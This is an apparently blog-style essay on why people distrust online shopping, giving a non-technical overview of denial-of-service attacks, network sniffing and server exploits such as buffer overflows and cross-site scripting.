While I was handing over my credit card to the waiter in a restaurant, my mother was staring at me in shock. She asked me “what if they draw out all the money from your account?” Just then a question came to my mind; we rarely do even think twice before handing over our credit cards to a waiter or a store clerk, then why do we often feel jittery while purchasing something online, or going for online banking? What do we fear? The obvious answer was: Security.
Security issues regarding e-commerce websites is the biggest question mark in our mind whenever we go for an online transaction. While such issues may arise from improper technical setup, criminals don’t stay out of the game either. As a result, the headache of the common man increases. Apart from the fact that viruses, Trojans and malwares can affect any website, there are innumerable security issues of the e-commerce websites that can be brought into discussion, but here’s a list of the most important attacks:
- DoS attacks: No, it is not MS-DOS. DoS stands for Denial of Service. This method involves sending a huge number of automated requests to a website. The website server is misled into thinking that the requests are generating from authentic users; the server tries to process those requests as usual, and in the process it exceeds its capacity of operating at its usual normal speed due to the overwhelming volume of the requests encountered. This slows down the server drastically, and hence, the server fails to accept requests from genuine users. DDoS or Distributed Denial of Service is another similar method in which the attacker infects several computers on the internet using a virus or other means and converts all those computers into its slave. Botnets can be used to perform this task. The attacker uses all these computers to send useless requests to the target server, thus slowing down the victim server and hence blocking out the real users. DoS attacks running for even a few minutes can cause huge losses.
- Sniffing: Sniffing the network connecting the customer computer and server can end up putting sensitive information into the hands of the criminal/cracker. This is done by monitoring the data flow between the computer of the customer and the server. The attacker can accomplish this task by getting into the network at certain specific points. Obviously places near the customer’s system or the server are the two such important positions. Wireless hubs are an important example of such points which can be attacked to get hold of unencrypted information from the customer system. And obviously there is no need to say what can happen if someone gets hold of your credit card information in such a way. Similarly, points near the server can also be scanned to monitor the incoming traffic into the servers. However, this traffic is supposed to be encrypted, and hence it is of less use to the attacker. Sniffing of networks is prevented though by using SSL security.
- Server root exploits: Using server root exploits is another very effective method to gain unauthorized access to data. Attacking a customer system can only give information about a single user to the attacker. But attacking a server can reveal both the merchant’s and all the customer’s information to the attacker. Basically, this is done by finding specific security holes, and computer program bugs in the target servers and then exploiting them. Buffer Overflow Attack, and Cross Site Scripting(XSS) are two such exploits. While buffer overflow attack corrupts the execution stack of a web application by tricking the server to execute code written by the attacker, XSS is used for data retrieval from the server databases by the attacker, by constructing scripts that are executed by the server.
These are only a few attacks which drive potential E-Commerce users paranoid due to which they end up going for offline options. If E-Commerce players find solution to this trust establishment issue by making their portals rock-solid, a huge section of potential customers can be unlocked.